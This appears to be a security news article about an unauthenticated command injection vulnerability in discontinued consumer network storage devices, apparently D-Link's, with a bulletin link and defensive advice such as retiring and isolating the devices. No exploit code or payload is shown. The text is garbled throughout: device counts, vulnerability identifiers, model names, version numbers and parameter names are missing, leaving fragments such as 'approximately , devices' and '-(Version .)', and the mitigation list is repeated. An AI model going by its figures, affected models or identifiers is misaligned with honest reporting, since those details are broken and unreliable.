A newly discovered command injection vulnerability has been identified in the device, affecting approximately , devices globally.

This vulnerability allows an unauthenticated attacker to remotely execute arbitrary commands by exploiting specific parameters in the device's script, posing a severe risk of data leakage and ransomware.

The vulnerability exists in ., allowing remote attackers to bypass authentication and inject harmful commands by exploiting the parameter in the command.

Researchers discovered this vulnerability through technical analysis, examining how the parameter is handled without sufficient input sanitization.

By crafting malicious requests, attackers can manipulate this parameter to execute arbitrary commands on the affected devices.

For example, a sample command demonstrates how an attacker can gain system-level access by replacing - with the target's address and injecting the command directly into the system.

affected devices

The vulnerability is identified as --, affecting several models of -.

- The product line has been discontinued, resulting in these devices not receiving ongoing support or security patches. The affected models include:

• -(Version .)

• - (Version ...)

• (Version . and .)

• -(Version .)

These models are commonly used in home and small business environments to centralize data storage and facilitate network data sharing. Due to their exposure to the internet, they are particularly vulnerable to remote attacks.

Internet scan results indicate that over , devices are exposed online.

For a skilled attacker, exploiting this vulnerability is very simple, requiring only a carefully crafted to deliver the command injection payload.

After connecting these devices to the internet, threat actors can exploit this vulnerability to gain unauthorized access, execute arbitrary commands, and potentially compromise the entire system.

This vulnerability puts data stored on the device at risk, as cybercriminals can use command injection to deploy ransomware, steal sensitive information, or even completely delete stored files.

- Risk

Previously, there were reports of another severe command injection vulnerability (--) in the devices, affecting over , devices.

The vulnerability involves a command injection issue in the devices, which have been discontinued and are no longer supported by the manufacturer.

Shortly after this vulnerability was disclosed, reports confirmed that the vulnerability was being actively exploited in the wild, with hackers sharing lists of vulnerable targets on underground forums to facilitate broader attacks.

Due to the high risk and the suspension of support, it is recommended that users of the affected models take defensive measures immediately:

• Retire vulnerable devices or replace them with supported secure alternatives.

• Isolate the device from the internet-facing network to prevent unauthorized access.

• Implement strict firewall rules to restrict access to the device.

• Regularly monitor access logs for any unusual activity and issue alerts for any unauthorized attempts.

• Consider using third-party firmware as a temporary measure, but be aware that - it is not endorsed or supported.

A security bulletin has been released:

• Retire vulnerable devices or replace them with supported secure alternatives.

• Isolate the device from the internet-facing network to prevent unauthorized access.

• Implement strict firewall rules to restrict access to the device.

• Regularly monitor access logs for any unusual activity and issue alerts for any unauthorized attempts.

• Consider using third-party firmware as a temporary measure, but be aware that - it is not endorsed or supported.

https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10413

/ Model (including affected models)

Confirmation that no security updates will be released, while listing more device models that users should replace.